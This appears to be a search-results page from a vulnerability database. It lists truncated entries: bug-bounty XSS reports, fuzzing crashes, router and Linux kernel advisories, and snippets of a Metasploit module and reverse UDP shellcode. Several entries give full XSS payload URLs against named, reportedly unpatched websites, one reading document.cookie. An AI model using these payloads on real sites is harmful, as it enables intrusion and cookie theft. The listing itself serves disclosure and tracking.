
2661 matches found

Openbugbounty
added 2017/10/08 6:1 p.m. | 10 views

informationpackaging.ca XSS vulnerability

Vulnerable URL: http://www.informationpackaging.ca/send-page.php?url=/request-a-sample.php=%22%3E%3CimG/sRc=l%20oNerrOr=prompt/OPENBUGBOUNTY/%20x%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 06.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly...

6.3 AI score
Exploits: 0
ossfuzz
added 2017/09/19 7:25 a.m. | 12 views

openthread: Stack-buffer-overflow in ot::NetworkData::PrefixTlv::GetSubTlvs

Detailed report: https://oss-fuzz.com/testcase?key=5490815742771200 Project: openthread Fuzzer: libFuzzeropenthreadip6-send-fuzzer Fuzz target binary: ip6-send-fuzzer Job Type: libfuzzerasanopenthread Platform Id: linux Crash Type: Stack-buffer-overflow READ 1 Crash Address: 0x7fb823a8eb22 Crash...

6.7 AI score
Exploits: 0 | Affected Software: 1
Openbugbounty
added 2017/09/15 11:7 a.m. | 12 views

zdravskolhb.cz XSS vulnerability

Vulnerable URL: http://www.zdravskolhb.cz/scripts/formsend.php?email=zdravskol@zdravskol%27%22%3E%3Cscript%3Ealert/OPENBUGBOUNTY/;%3C/script%3Ehb.cz=prihlasky-na-zkousky/=true=500=300 Details: Description| Value ---|--- Patched:| No Latest check for patch:| 14.12.2017 Vulnerability type:| XSS...

6.3 AI score
Exploits: 0
ossfuzz
added 2017/09/14 10:48 a.m. | 17 views

openthread: Stack-buffer-overflow in ot::MeshCoP::CommissionerSessionIdTlv::GetCommissionerSessionId

Project: https://github.com/openthread/openthread.git Detailed report: https://oss-fuzz.com/testcase?key=6738146924429312 Project: openthread Fuzzer: libFuzzeropenthreadip6-send-fuzzer Fuzz target binary: ip6-send-fuzzer Job Type: libfuzzerasanopenthread Platform Id: linux Crash Type:...

6.7 AI score
Exploits: 0 | Affected Software: 1
CNVD
added 2017/09/14 12:0 a.m. | 3 views

D-Link DIR-850L REV.B Privilege Acquisition Vulnerability (CNVD-2017-31792)

The D-Link DIR-850L REV.B is a wireless router from AUO D-Link. A security vulnerability exists in the registersend.php file in D-Link DIR-850L REV.B devices using firmware FW208WWb02 and prior versions, which stems from the program failing to require authentication. An attacker could exploit the...

9.8 CVSS | 9.2 AI score | 0.00691 EPSS
Exploits: 1 | References: 1
0day.today
added 2017/09/13 12:0 a.m. | 43 views

Trend Micro Control Manager - ImportFile Directory Traversal RCE Exploit

Exploit for windows platform in category remote exploits require 'msf/core' require 'msf/core/exploit/phpexe' class MetasploitModule 'Trend Micro Control Manager importFile Directory Traversal RCE', 'Description' = %q This module exploits a directory traversal vulnerability found in Trend Micro...

6.7 AI score
Exploits: 0
Positive Technologies
added 2017/09/13 12:0 a.m. | 5 views

PT-2017-13461 · D Link · D-Link Dir-850L

Name of the Vulnerable Software and Affected Versions: D-Link DIR-850L REV. B versions through FW208WWb02 Description: The issue concerns the register send.php file, which does not require authentication. This can lead to unintended enrollment in mydlink Cloud Services. Recommendations: For D-Lin...

9.8 CVSS | 9.2 AI score | 0.00691 EPSS
Exploits: 1 | References: 2
ossfuzz
added 2017/09/07 11:1 a.m. | 16 views

openthread: Stack-buffer-overflow in ot::MeshCoP::CommissionerSessionIdTlv::GetCommissionerSessionId

Project: https://github.com/openthread/openthread.git Detailed report: https://oss-fuzz.com/testcase?key=4750024565063680 Project: openthread Fuzzer: libFuzzeropenthreadip6-send-fuzzer Fuzz target binary: ip6-send-fuzzer Job Type: libfuzzerasanopenthreaduntrusted Platform Id: linux Crash Type:...

6.7 AI score
Exploits: 0 | Affected Software: 1
Openbugbounty
added 2017/09/07 7:4 a.m. | 10 views

collegesearch.in XSS vulnerability

Vulnerable URL: https://www.collegesearch.in/send-profile.php?instituteid=2405%22%3E%3Ch1%3EM0ns7er%3C/h1%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C/br%3E%3Cimg%20src=%22https://images.cooltext.com/4956678.gif%22%20width=%22166%22%20height=%2270%22%20alt=%22m0ns7er%22%20/%3E Details...

6.3 AI score
Exploits: 0
RedHat Linux
added 2017/09/06 8:36 p.m. | 2 views

kernel: net: IPv6 fragmentation implementation of nexthdr field may be associated with an invalid option

The IPv6 fragmentation implementation in the Linux kernel does not consider that the nexthdr field may be associated with an invalid option, which allows local users to cause a denial of service out-of-bounds read and BUG or possibly have unspecified other impact via crafted socket and send syste...

7.8 CVSS | 7.2 AI score | 0.00074 EPSS
Exploits: 0 | References: 4
Mageia
added 2017/08/28 8:14 a.m. | 13 views

Updated kmail(kdepimlibs4) packages fix security vulnerability and bugs

The kdepimlibs4, kdepim4, kdepim4-runtime, and akonadi packages have been updated to include the latest bug fixes from upstream. This includes a fix for an issue where the Send Later function in kmail would cause an e-mail that had been designated to be sent encrypted would be sent in plain text...

1.4 AI score
Exploits: 0 | References: 3
Prion
added 2017/07/24 1:29 p.m. | 10 views

Cross site request forgery (csrf)

In SimpleRisk 20170614-001, a CSRF attack on reset.php aka the Send Password Reset Email form can insert XSS sequences via the user parameter...

4.3 CVSS | 6 AI score | 0.0024 EPSS
Exploits: 1 | References: 2 | Affected Software: 1
Openbugbounty
added 2017/07/15 8:58 p.m. | 11 views

taokaenoi.co.th XSS vulnerability

Vulnerable URL: http://www.taokaenoi.co.th/sendtofriend.php Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 718048 VIP website status:| No Check taokaenoi.co.th SSL connection:|...

6.3 AI score
Exploits: 0
BDU FSTEC
added 2017/07/14 12:0 a.m. | 2 views

The vulnerability of the sock_setsockopt function in the kernel of the Linux operating system’s net/core/sock.c file allows a hacker to cause a service failure or exert other effects.

The vulnerability of the sock_setsockopt function in the kernel’s net/core/sock.c file in the Linux operating system arises from the execution of an operation beyond the buffer boundaries in memory. Exploiting this vulnerability allows a local attacker to cause a service failure or other adverse...

7.2 CVSS | 7.2 AI score | 0.00054 EPSS
Exploits: 0 | References: 6 | Affected Software: 1
Tenable Nessus
added 2017/07/03 12:0 a.m. | 26 views

openSUSE Security Update : kdepim4 (openSUSE-2017-755)

This update for kdepim4 fixes the following issues : - CVE-2017-9604: The kmail 'send later' function does not have 'sign/encryption' action ensured. boo1044210 The package kdepim-addons was updated to conflict with 4.x based akonadi package to prevent file conflicts. boo1045936 %NASLMINLEVEL 703...

7.5 CVSS | 6.8 AI score | 0.00163 EPSS
Exploits: 0 | References: 3
OSV
added 2017/07/02 8:59 a.m. | 6 views

OPENSUSE-SU-2017:1756-1 Security update for kdepim, messagelib

This update for kdepim and messagelib fixes the following issues: - CVE-2017-9604: The kmail 'send later' function does not have 'sign/encryption' action ensured. boo1044210...

7.5 CVSS | 7.5 AI score | 0.00163 EPSS
Exploits: 0 | References: 2
OSV
added 2017/07/02 8:59 a.m. | 6 views

OPENSUSE-SU-2017:1748-1 Security update for kdepim, messagelib

This update for kdepim and messagelib fixes the following issues: - CVE-2017-9604: The kmail 'send later' function does not have 'sign/encryption' action ensured. boo1044210...

7.5 CVSS | 7.5 AI score | 0.00163 EPSS
Exploits: 0 | References: 2
Broadcom
added 2017/06/23 12:0 a.m. | 7 views

BSA-2017-317

Security Advisory ID : BSA-2017-317 Component : Apache Tomcat Revision : 2.0: Interim In Apache Tomcat 9.0.0.M1 to 9.0.0.M18 and 8.5.0 to 8.5.12, the refactoring of the HTTP connectors introduced a regression in the send file processing. If the send file processing completed quickly, it was...

9.8 CVSS | 8.6 AI score | 0.06144 EPSS
Exploits: 0
0day.today
added 2017/06/21 12:0 a.m. | 22 views

Linux/x86 - Reverse UDP Shellcode (668 bytes)

; SLAE-X ; thanks to writesup from previou students : ; assignment: 2. create a reverse shell ; originality: using UDP instead TCP ; usage : sudo ncat -lup 53 on the receiving end ; warning, this shellcode might contains null byte if you use certain ip / address %define htonsx x 8 & 0xFF | x & 0x...

Exploits: 0
Exploit DB
added 2017/06/20 12:0 a.m. | 27 views

Linux/x86 - Reverse UDP Shellcode (668 bytes)

Linux/x86 - Reverse UDP Shellcode 668 bytes. Shellcode exploit for Linx86 platform ; SLAE-X ; thanks to writesup from previou students : ; assignment: 2. create a reverse shell ; originality: using UDP instead TCP ; usage : sudo ncat -lup 53 on the receiving end ; warning, this shellcode might...

7.4 AI score
Exploits: 0